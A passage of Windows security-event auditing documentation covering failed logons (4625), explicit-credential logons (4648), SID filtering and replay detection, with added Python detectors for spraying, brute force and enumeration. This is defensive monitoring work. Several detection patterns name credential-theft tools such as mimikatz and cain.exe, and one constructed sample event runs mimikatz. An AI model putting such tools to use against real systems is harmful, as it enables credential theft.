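        if code == 0xC0000234:
            alerts.add(("lockout", ev["IpAddress"], ev["TargetUserName"]))
        elif code in BAD_CREDENTIALS:
            by_source[ev["IpAddress"]].append(ev)
    for source, evs in by_source.items():
        evs.sort(key=lambda e: e["time"])
        start = 0
        for end, ev in enumerate(evs):
            while evs[start]["time"] < ev["time"] - window:   # drop events older than the window
                start += 1
            in_window = evs[start:end + 1]
            user = ev["TargetUserName"].lower()
            if len({e["TargetUserName"].lower() for e in in_window}) >= spray_accounts:
                alerts.add(("password_spray", source, "*"))
            if sum(e["TargetUserName"].lower() == user for e in in_window) >= brute_attempts:
                alerts.add(("brute_force", source, ev["TargetUserName"]))
    return sorted(alerts)


T0 = datetime(2015, 9, 8, 22, 0)


def make_event(minute, user, ip, status="0xc000006d", sub="0xc000006a"):
    """Constructed 4625 record with only the fields the detector reads."""
    return {"time": T0 + timedelta(minutes=minute), "TargetUserName": user,
            "IpAddress": ip, "Status": status, "SubStatus": sub, "LogonType": "3"}


# Constructed sample batch (not real log data).
SAMPLE_4625 = (
    [make_event(i, "user%02d" % i, "203.0.113.7") for i in range(6)]              # spray
    + [make_event(i, "svc_backup", "198.51.100.9") for i in range(12)]            # brute force
    + [make_event(13, "svc_backup", "198.51.100.9", "0xc0000234", "0x0")]         # resulting lockout
    + [make_event(30, "alice", "10.1.2.3"), make_event(31, "alice", "10.1.2.3")]  # benign typos
)

if __name__ == "__main__":
    print(describe_failure("0xc0000234", "0x0"))  # account locked out
    for alert in detect_failed_logons(SAMPLE_4625):
        print(alert)
```

Two details worth noting: the lockout event itself carries Status 0xC0000234 with Sub Status 0x0, exactly as in the sample event above, so the decoder must fall back to Status when Sub Status is zero; and the lockout is deliberately not counted as a guess, otherwise a locked account would keep inflating the brute-force count after the attacker has already been stopped.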
Process Information:
Caller Process ID [Type = Pointer]: hexadecimal Process ID of the process that attempted the logon.
Process ID (PID ) is a number used by the operating system to uniquely identify an active process. To see
the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Caller Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Network Information:
Workstation Name [Type = UnicodeString]: machine name from which logon attempt was performed.
Source Network Address [Type = UnicodeString]: IP address of machine from which logon attempt was
performed.
IPv6 address or ::ffff:IPv4 address of a client.
::1 or 127.0.0.1 means localhost.
Source Port [Type = UnicodeString]: source port which was used for logon attempt from remote machine.
0 for interactive logons.
Detailed Authentication Information:
Logon Process [Type = UnicodeString]: the name of the trusted logon process that was used for the
logon attempt. See event “4611: A trusted logon process has been registered with the Local Security
Authority” description for more information.
Authentication Package [Type = UnicodeString]: The name of the authentication package which was
used for the logon authentication process. Default packages loaded on LSA startup are located in
“HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig” registry key. Other packages can be loaded
at runtime. When a new package is loaded a “4610: An authentication package has been loaded by the
Local Security Authority” (typically for NTLM ) or “4622: A security package has been loaded by the Local
Security Authority” (typically for Kerberos) event is logged to indicate that a new package has been loaded
along with the package name. The most common authentication packages are:
NTLM – NTLM -family Authentication
Kerberos – Kerberos authentication.
Negotiate – the Negotiate security package selects between Kerberos and NTLM protocols.
Negotiate selects Kerberos unless it cannot be used by one of the systems involved in the
authentication or the calling application did not provide sufficient information to use Kerberos.
Transited Services [Type = UnicodeString] [Kerberos-only]: the list of transited services. Transited
services are populated if the logon was a result of a S4U (Service For User) logon process. S4U is a
Microsoft extension to the Kerberos Protocol to allow an application service to obtain a Kerberos service
ticket on behalf of a user – most commonly done by a front-end website to access an internal resource on
behalf of a user. For more information about S4U, see https://msdn.microsoft.com/library/cc246072.aspx
Package Name (NTLM only) [Type = UnicodeString]: the name of the LAN Manager sub-package (NTLM-family protocol name) that was used during the logon attempt. Possible values are:
“NTLM V1”
“NTLM V2”
“LM”
Only populated if “Authentication Package” = “NTLM”.
Key Length [Type = UInt32]: the length of the NTLM Session Security key. Typically it is 128 bits or 56 bits long. This parameter is always 0 if “Authentication Package” = “Kerberos”, because it is not applicable to the Kerberos protocol. This field will also have the value “0” if Kerberos was negotiated using the Negotiate authentication package.

Security Monitoring Recommendations

For 4625(F): An account failed to log on.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz”
or “cain.exe”), check for these substrings in “Process Name.”
If Subject\Account Name is a name of service account or user account, it may be useful to investigate
whether that account is allowed (or expected) to request logon for Account For Which Logon
Failed\Security ID.
To monitor for a mismatch between the logon type and the account that uses it (for example, if Logon
Type 4-Batch or 5-Service is used by a member of a domain administrative group), monitor Logon Type
in this event.
If you have a high-value domain or local account for which you need to monitor every lockout, monitor all
4625 events with the “Subject\Security ID” that corresponds to the account.
We recommend monitoring all 4625 events for local accounts, because these accounts typically should not
be locked out. This is especially relevant for critical servers, administrative workstations, and other high
value assets.
We recommend monitoring all 4625 events for service accounts, because these accounts should not be
locked out or prevented from functioning. This is especially relevant for critical servers, administrative
workstations, and other high value assets.
If your organization restricts logons in the following ways, you can use this event to monitor accordingly:
If the “Account For Which Logon Failed \Security ID” should never be used to log on from the
specific Network Information\Workstation Name.
If a specific account, such as a service account, should only be used from your internal IP address
list (or some other list of IP addresses). In this case, you can monitor for Network
Information\Source Network Address and compare the network address with your list of IP
addresses.
If a particular version of NTLM is always used in your organization. In this case, you can use this
event to monitor Package Name (NTLM only), for example, to find events where Package
Name (NTLM only) does not equal NTLM V2.
If NTLM is not used in your organization, or should not be used by a specific account (New Logon\Security ID). In this case, monitor for all events where Authentication Package is NTLM.
If the Authentication Package is NTLM. In this case, monitor for Key Length not equal to 128,
because all Windows operating systems starting with Windows 2000 support 128-bit Key Length.
If Logon Process is not from a trusted logon processes list.
Monitor for all events with the fields and values in the following table:

FIELD: Failure Information\Status or Failure Information\Sub Status
VALUE TO MONITOR FOR:
0XC000005E – “There are currently no logon servers available to service the logon request.” This is typically not a security issue but it can be an infrastructure or availability issue.
0xC0000064 – “User logon with misspelled or bad user account”. Especially if you get a number of these in a row, it can be a sign of a user enumeration attack.
0xC000006A – “User logon with misspelled or bad password” for critical accounts or service accounts. Especially watch for a number of such events in a row.
0XC000006D – “This is either due to a bad username or authentication information” for critical accounts or service accounts. Especially watch for a number of such events in a row.
0xC000006F – “User logon outside authorized hours”.
0xC0000070 – “User logon from unauthorized workstation”.
0xC0000072 – “User logon to account disabled by administrator”.
0XC000015B – “The user has not been granted the requested logon type (aka logon right) at this machine”.
0XC0000192 – “An attempt was made to logon, but the Netlogon service was not started”. This is typically not a security issue but it can be an infrastructure or availability issue.
0xC0000193 – “User logon with expired account”.
0XC0000413 – “Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine”.
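The following Python script is an added example, not code from the Microsoft documentation. It applies the 4625 recommendations above (and the Authentication Package, Package Name and Key Length field descriptions earlier) to events exported as XML: it maps Status/Sub Status to the table, flags NTLM V1/LM and non-128-bit keys, checks Process Name against standard and restricted folders and substrings, flags Batch/Service logons by domain admins, and counts runs of 0xC0000064 failures per source address. The EventData names (Status, SubStatus, LmPackageName, KeyLength, AuthenticationPackageName, ProcessName, LogonType, TargetUserName, IpAddress) are those of the 4625 event XML; the admin list, folder lists, window and threshold, and all sample events are constructed for the example.

```python
"""Triage exported Windows Security 4625 (An account failed to log on) events.

Added example, not code from the Microsoft documentation.  EventData names
follow the 4625 event XML; policy lists and sample events are constructed.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict, deque
from datetime import datetime, timedelta

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Codes from the table above, lower-cased so "0XC..." and "0xC..." compare equal.
STATUS_MEANINGS = {
    "0xc000005e": "no logon servers available (availability issue)",
    "0xc0000064": "bad user account (possible user enumeration)",
    "0xc000006a": "bad password",
    "0xc000006d": "bad username or authentication information",
    "0xc000006f": "logon outside authorized hours",
    "0xc0000070": "logon from unauthorized workstation",
    "0xc0000072": "account disabled by administrator",
    "0xc000015b": "requested logon type (logon right) not granted",
    "0xc0000192": "Netlogon service not started (availability issue)",
    "0xc0000193": "expired account",
    "0xc0000413": "blocked by authentication firewall",
}
STANDARD_FOLDERS = ("c:\\windows\\system32\\", "c:\\program files\\")   # constructed list
RESTRICTED_SUBSTRINGS = ("mimikatz", "cain.exe")
DOMAIN_ADMINS = {"dadmin"}   # constructed: accounts that must not use Batch (4) / Service (5) logons


def parse_event(xml_text):
    """Return (TimeCreated as datetime, {Data Name: value}) for one exported event."""
    root = ET.fromstring(xml_text)
    when = root.find("e:System/e:TimeCreated", NS).get("SystemTime")
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return datetime.strptime(when[:19], "%Y-%m-%dT%H:%M:%S"), data


def findings_for(data):
    """Per-event checks; returns a list of short finding strings (empty = nothing notable)."""
    out = []
    # Sub Status is the more specific code, so it is consulted first.
    for code in (data.get("SubStatus", "").lower(), data.get("Status", "").lower()):
        if code in STATUS_MEANINGS:
            out.append(f"status {code}: {STATUS_MEANINGS[code]}")
            break
    if data.get("AuthenticationPackageName") == "NTLM":
        lm = data.get("LmPackageName", "")
        if lm in ("NTLM V1", "LM"):
            out.append(f"weak NTLM sub-package {lm}")
        if data.get("KeyLength") != "128":
            out.append(f"NTLM key length {data.get('KeyLength')} != 128")
    proc = data.get("ProcessName", "").lower()
    if proc and proc != "-":
        if not proc.startswith(STANDARD_FOLDERS):
            out.append(f"process outside standard folders: {proc}")
        if any(s in proc for s in RESTRICTED_SUBSTRINGS):
            out.append(f"restricted substring in process name: {proc}")
    if data.get("TargetUserName", "").lower() in DOMAIN_ADMINS and data.get("LogonType") in ("4", "5"):
        out.append(f"domain admin used logon type {data['LogonType']}")
    return out


def bursts(events, window=timedelta(minutes=5), threshold=5):
    """Source addresses with `threshold` or more 0xC0000064 (bad user account) failures
    inside a sliding `window`: the 'number of these in a row' user-enumeration signal."""
    recent, alerts = defaultdict(deque), set()
    for when, data in sorted(events, key=lambda e: e[0]):
        if data.get("SubStatus", "").lower() != "0xc0000064":
            continue
        src = data.get("IpAddress", "-")
        q = recent[src]
        q.append(when)
        while when - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            alerts.add(src)
    return alerts


def make_4625(time, target, src, status, sub, proc="C:\\Windows\\System32\\svchost.exe",
              pkg="NTLM", lm="NTLM V2", keylen="128", logon_type="3"):
    """Constructed 4625 event in the exported XML shape (sample input only)."""
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4625</EventID>'
            f'<TimeCreated SystemTime="{time}Z"/></System><EventData>'
            f'<Data Name="TargetUserName">{target}</Data><Data Name="Status">{status}</Data>'
            f'<Data Name="SubStatus">{sub}</Data><Data Name="LogonType">{logon_type}</Data>'
            f'<Data Name="AuthenticationPackageName">{pkg}</Data><Data Name="LmPackageName">{lm}</Data>'
            f'<Data Name="KeyLength">{keylen}</Data><Data Name="ProcessName">{proc}</Data>'
            f'<Data Name="IpAddress">{src}</Data></EventData></Event>')


# Constructed samples: an NTLM V1 / 56-bit failure, a domain admin batch logon from a
# restricted tool path, and six bad-user-account failures from one source within a minute.
SAMPLE_EVENTS = [
    make_4625("2015-09-10T02:00:00", "svc_backup", "10.0.0.100", "0xC000006D", "0xC000006A",
              lm="NTLM V1", keylen="56"),
    make_4625("2015-09-10T02:00:10", "dadmin", "10.0.0.101", "0xC000006D", "0xC000006A",
              proc="C:\\Users\\Public\\mimikatz.exe", pkg="Negotiate", lm="-", keylen="0", logon_type="4"),
] + [make_4625(f"2015-09-10T02:01:{i * 10:02d}", f"probe{i}", "10.0.0.200", "0xC000006D", "0xC0000064")
     for i in range(6)]


def run_sample():
    """Returns ([findings per event], burst sources) for the constructed events."""
    parsed = [parse_event(x) for x in SAMPLE_EVENTS]
    return [findings_for(d) for _, d in parsed], bursts(parsed)
```

Per-event findings and the burst set are returned separately so the availability-type codes (0XC000005E, 0XC0000192) can be routed to operations while the rest go to the security queue; in production the `make_4625` builder would be replaced by the events exported from the Security log.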
4648(S): A logon was attempted using explicit credentials.
4/5/2019 • 8 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Logon
Event Description:
This event is generated when a process attempts an account logon by explicitly specifying that account’s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the “RUNAS” command.
It is also a routine event which periodically occurs during normal operating system activity.

Note For recommendations, see Security Monitoring Recommendations for this event.
Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4648</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12544</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-10T02:54:50.771459000Z" />
<EventRecordID>233200</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="1116" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x31844</Data>
<Data Name="LogonGuid">{00000000-0000-0000-0000-000000000000}</Data>
<Data Name="TargetUserName">ladmin</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetLogonGuid">{0887F1E4-39EA-D53C-804F-31D568A06274}</Data>
<Data Name="TargetServerName">localhost</Data>
<Data Name="TargetInfo">localhost</Data>
<Data Name="ProcessId">0x368</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\svchost.exe</Data>
<Data Name="IpAddress">::1</Data>
<Data Name="IpPort">0</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the new logon session with explicit credentials. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the new logon session
with explicit credentials.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Logon GUID [Type = GUID]: a GUID that can help you correlate this event with another event that can contain the same Logon GUID, the “4769(S, F): A Kerberos service ticket was requested” event on a domain controller.
It also can be used for correlation between a 4648 event and several other events (on the same computer) that can contain the same Logon GUID, “4624(S): An account was successfully logged on” and “4964(S): Special groups have been assigned to a new logon.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify resources, activities or instances.

Account Whose Credentials Were Used:
Account Name [Type = UnicodeString]: the name of the account whose credentials were used.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon GUID [Type = GUID]: a GUID that can help you correlate this event with another event that can contain the same Logon GUID, the “4769(S, F): A Kerberos service ticket was requested” event on a domain controller.
It also can be used for correlation between a 4648 event and several other events (on the same computer) that can contain the same Logon GUID, “4624(S): An account was successfully logged on” and “4964(S): Special groups have been assigned to a new logon.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify resources, activities or instances.

Target Server:
Target Server Name [Type = UnicodeString]: the name of the server on which the new process was run.
Has “localhost” value if the process was run locally.
Additional Information [Type = UnicodeString]: there is no detailed information about this field in this
document.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process which was run using explicit credentials. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Network Information:
Network Address [Type = UnicodeString]: IP address of machine from which logon attempt was
performed.
IPv6 address or ::ffff:IPv4 address of a client.
::1 or 127.0.0.1 means localhost.
Port [Type = UnicodeString]: source port which was used for logon attempt from remote machine.
0 for interactive logons.

Security Monitoring Recommendations

For 4648(S): A logon was attempted using explicit credentials.
The following table is similar to the table in Appendix A: Security monitoring recommendations for many audit events, but also describes ways of monitoring that use “Account Whose Credentials Were Used\Security ID.”

TYPE OF MONITORING REQUIRED / RECOMMENDATION

High-value accounts: You might have high value domain or local accounts for which you need to monitor each action. Examples of high value accounts are database administrators, built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on.
Recommendation: Monitor this event with the “Subject\Security ID” or “Account Whose Credentials Were Used\Security ID” that correspond to the high value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours.
Recommendation: When you monitor for anomalies or malicious actions, use the “Subject\Security ID” and “Account Whose Credentials Were Used\Security ID” (with other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used.
Recommendation: Monitor this event with the “Subject\Security ID” or “Account Whose Credentials Were Used\Security ID” that correspond to the accounts that should never be used.

Account whitelist: You might have a specific whitelist of accounts that are allowed to perform actions corresponding to particular events.
Recommendation: If this event corresponds to a “whitelist-only” action, review the “Subject\Security ID” and “Account Whose Credentials Were Used\Security ID” for accounts that are outside the whitelist.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are not allowed to perform the action corresponding to this event.
Recommendation: Monitor for the “Subject\Account Domain” or “Account Whose Credentials Were Used\Security ID” corresponding to accounts from another domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain people (accounts) should not typically perform any actions.
Recommendation: Monitor the target Computer: (or other target device) for actions performed by the “Subject\Security ID” or “Account Whose Credentials Were Used\Security ID” that you are concerned about. For example, you might monitor to ensure that “Account Whose Credentials Were Used\Security ID” is not used to log on to a certain computer.

Account naming conventions: Your organization might have specific naming conventions for account names.
Recommendation: Monitor “Subject\Account Name” and “Account Whose Credentials Were Used\Security ID” for names that don’t comply with naming conventions.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz”
or “cain.exe”), check for these substrings in “Process Name.”
If Subject\Security ID should not know or use credentials for Account Whose Credentials Were
Used\Account Name, monitor this event.
If credentials for Account Whose Credentials Were Used\Account Name should not be used from
Network Information\Network Address, monitor this event.
Check that Network Information\Network Address is from internal IP address list. For example, if you
know that a specific account (for example, a service account) should be used only from specific IP
addresses, you can monitor for all events where Network Information\Network Address is not one of
the allowed IP addresses.
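As an added example (not Microsoft's code), the Python below checks 4648 events against the last three recommendations: whether the Subject is expected to present the credentials of the Account Whose Credentials Were Used, whether Network Information\Network Address is in the internal address list, and whether a service account is being used from a source outside its allowed addresses. It also normalises the ::1 and ::ffff:IPv4 forms the field description above mentions. The EventData names match the 4648 XML shown above; the policy tables and sample events are constructed for the example.

```python
"""Check Windows Security 4648 (logon attempted using explicit credentials) events
against an organisation's expectations.  Added example, not Microsoft's code.
EventData names match the 4648 XML above; policy and sample events are constructed.
"""
import ipaddress


def account(domain, name):
    """Normalised DOMAIN\\user key."""
    return f"{domain}\\{name}".lower()


# Constructed policy: which subjects may present which accounts' credentials.
ALLOWED_TARGETS = {
    account("CONTOSO", "dadmin"): {account("CONTOSO", "ladmin")},
    account("CONTOSO", "sched"): {account("CONTOSO", "svc_backup")},
}
# Constructed internal address list; ::1 and 127.0.0.1 mean localhost.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "127.0.0.0/8", "::1/128")]
# Constructed: service accounts that may only be used from specific sources.
SOURCE_NETS = {account("CONTOSO", "svc_backup"): [ipaddress.ip_network("10.0.5.0/24")]}


def normalise_ip(text):
    """Network Address is '-' when unknown, ::1 for localhost, or ::ffff:IPv4 for IPv4 clients."""
    if not text or text == "-":
        return None
    addr = ipaddress.ip_address(text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped        # compare the embedded IPv4 address
    return addr


def check_4648(ev):
    """Returns the findings for one event as a list of strings (empty = as expected)."""
    subject = account(ev["SubjectDomainName"], ev["SubjectUserName"])
    target = account(ev["TargetDomainName"], ev["TargetUserName"])
    out = []
    allowed = ALLOWED_TARGETS.get(subject)
    if allowed is None:
        out.append(f"{subject} is not expected to use explicit credentials")
    elif target not in allowed:
        out.append(f"{subject} used credentials of {target}")
    src = normalise_ip(ev.get("IpAddress"))
    if src is not None:
        if not any(src in net for net in INTERNAL_NETS):
            out.append(f"source {src} is not in the internal address list")
        nets = SOURCE_NETS.get(target)
        if nets and not any(src in net for net in nets):
            out.append(f"{target} used from {src}, outside its allowed sources")
    return out


# Constructed sample events in the shape of the 4648 EventData above.
SAMPLE_EVENTS = [
    {"SubjectDomainName": "CONTOSO", "SubjectUserName": "dadmin", "TargetDomainName": "CONTOSO",
     "TargetUserName": "ladmin", "TargetServerName": "localhost", "IpAddress": "::1"},
    {"SubjectDomainName": "CONTOSO", "SubjectUserName": "dadmin", "TargetDomainName": "CONTOSO",
     "TargetUserName": "svc_backup", "TargetServerName": "fs01", "IpAddress": "::ffff:10.0.5.20"},
    {"SubjectDomainName": "CONTOSO", "SubjectUserName": "sched", "TargetDomainName": "CONTOSO",
     "TargetUserName": "svc_backup", "TargetServerName": "fs01", "IpAddress": "::ffff:203.0.113.7"},
    {"SubjectDomainName": "CONTOSO", "SubjectUserName": "jdoe", "TargetDomainName": "CONTOSO",
     "TargetUserName": "svc_backup", "TargetServerName": "fs01", "IpAddress": "-"},
]


def run_sample():
    """Findings per constructed event, in order."""
    return [check_4648(ev) for ev in SAMPLE_EVENTS]
```

The first sample mirrors the event on this page (dadmin using ladmin's credentials from ::1) and produces no finding; the unknown-source case ("-") is deliberately left without an address finding, because the absence of an address is not itself evidence of misuse.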
4675(S): SIDs were filtered.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This event generates when SIDs were filtered for a specific Active Directory trust.
See more information about SID filtering here: https://technet.microsoft.com/library/cc772633(v=ws.10).aspx.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

There is no example of this event in this document.
Subcategory: Audit Logon
Event Schema:
SIDs were filtered.
Target Account:

Security ID:%1
Account Name:%2
Account Domain:%3

Trust Information:

Trust Direction:%4
Trust Attributes:%5
Trust Type:%6
TDO Domain SID:%7
Filtered SIDs:%8

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Security Monitoring Recommendations
If you need to monitor all SID filtering events/operations for specific or all Active Directory trusts, you can use
this event to get all required information.
Audit Network Policy Server
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Network Policy Server allows you to audit events generated by RADIUS (IAS) and Network Access Protection (NAP) activity related to user access requests. These requests can be Grant, Deny, Discard, Quarantine, Lock, and Unlock.
If you configure this subcategory, an audit event is generated for each IAS and NAP user access request.
This subcategory generates events only if the NAS or IAS role is installed on the server.
NAP events can be used to help understand the overall health of the network.
Event volume: Medium to High on servers that are running Network Policy Server (NPS).
Role-specific subcategories are outside the scope of this document.

COMPUTER TYPE / GENERAL SUCCESS / GENERAL FAILURE / STRONGER SUCCESS / STRONGER FAILURE / COMMENTS

Domain Controller: General Success = IF, General Failure = IF, Stronger Success = IF, Stronger Failure = IF. Comments: IF – if a server has the Network Policy Server (NPS) role installed and you need to monitor access requests and other NPS-related events, enable this subcategory.

Member Server: General Success = IF, General Failure = IF, Stronger Success = IF, Stronger Failure = IF. Comments: IF – if a server has the Network Policy Server (NPS) role installed and you need to monitor access requests and other NPS-related events, enable this subcategory.

Workstation: General Success = No, General Failure = No, Stronger Success = No, Stronger Failure = No. Comments: The Network Policy Server (NPS) role cannot be installed on a client OS.

6272: Network Policy Server granted access to a user.
6273: Network Policy Server denied access to a user.
6274: Network Policy Server discarded the request for a user.
6275: Network Policy Server discarded the accounting request for a user.
6276: Network Policy Server quarantined a user.
6277: Network Policy Server granted access to a user but put it on probation because the host did not meet the defined health policy.
6278: Network Policy Server granted full access to a user because the host met the defined health policy.
6279: Network Policy Server locked the user account due to repeated failed authentication attempts.
6280: Network Policy Server unlocked the user account.
Audit Other Logon/Logoff Events
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Other Logon/Logoff Events determines whether Windows generates audit events for other logon or logoff
events.
These other logon or logoff events include:
A Remote Desktop session connects or disconnects.
A workstation is locked or unlocked.
A screen saver is invoked or dismissed.
A replay attack is detected. This event indicates that a Kerberos request was received twice with identical
information. This condition could also be caused by network misconfiguration.
A user is granted access to a wireless network. It can be either a user account or the computer account.
A user is granted access to a wired 802.1x network. It can be either a user account or the computer
account.
Logon events are essential to understanding user activity and detecting potential attacks.
Event volume: Low.

COMPUTER TYPE / GENERAL SUCCESS / GENERAL FAILURE / STRONGER SUCCESS / STRONGER FAILURE / COMMENTS

Domain Controller: General Success = Yes, General Failure = Yes, Stronger Success = Yes, Stronger Failure = Yes. Comments: We recommend Success auditing, to track possible Kerberos replay attacks, terminal session connect and disconnect actions, network authentication events, and some other events. Volume of these events is typically very low. Failure events will show you when requested credentials CredSSP delegation was disallowed by policy. The volume of these events is very low—typically you will not get any of these events.

Member Server: General Success = Yes, General Failure = Yes, Stronger Success = Yes, Stronger Failure = Yes. Comments: We recommend Success auditing, to track possible terminal session connect and disconnect actions, network authentication events, and some other events. Volume of these events is typically very low. Failure events will show you when requested credentials CredSSP delegation was disallowed by policy. The volume of these events is very low—typically you will not get any of these events.

Workstation: General Success = Yes, General Failure = Yes, Stronger Success = Yes, Stronger Failure = Yes. Comments: We recommend Success auditing, to track possible terminal session connect and disconnect actions, network authentication events, and some other events. Volume of these events is typically very low. Failure events will show you when requested credentials CredSSP delegation was disallowed by policy. The volume of these events is very low—typically you will not get any of these events.

Events List:
4649(S): A replay attack was detected.
4778(S): A session was reconnected to a Window Station.
4779(S): A session was disconnected from a Window Station.
4800(S): The workstation was locked.
4801(S): The workstation was unlocked.
4802(S): The screen saver was invoked.
4803(S): The screen saver was dismissed.
5378(F): The requested credentials delegation was disallowed by policy.
5632(S): A request was made to authenticate to a wireless network.
5633(S): A request was made to authenticate to a wired network.
4649(S): A replay attack was detected.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This event generates on domain controllers when a KRB_AP_ERR_REPEAT Kerberos response was sent to the client.
Domain controllers cache information from recently received tickets. If the server name, client name, time, and microsecond fields from the Authenticator match recently seen entries in the cache, the domain controller returns KRB_AP_ERR_REPEAT. You can read more about this in RFC 1510. One potential cause for this is a misconfigured network device between the client and server that could send the same packet(s) repeatedly.
There is no example of this event in this document.
Subcategory: Audit Other Logon/Logoff Events
Event Schema:
A replay attack was detected.
Subject:

Security ID:%1
Account Name:%2
Account Domain:%3
Logon ID:%4

Credentials Which Were Replayed:

Account Name:%5
Account Domain:%6

Process Information:

Process ID:%12
Process Name:%13

Network Information:

Workstation Name:%10

Detailed Authentication Information:

Request Type:%7
Logon Process:%8
Authentication Package:%9
Transited Services:%11

This event indicates that a Kerberos replay attack was detected - a request was received twice with identical information. This condition could be caused by network misconfiguration.
Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.

Security Monitoring Recommendations

For 4649(S): A replay attack was detected.
This event can be a sign of Kerberos replay attack or, among other things, network device configuration or
routing problems. In both cases, we recommend triggering an alert and investigating the reason the event was
generated.
4778(S): A session was reconnected to a Window Station.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Logon/Logoff Events
Event Description:
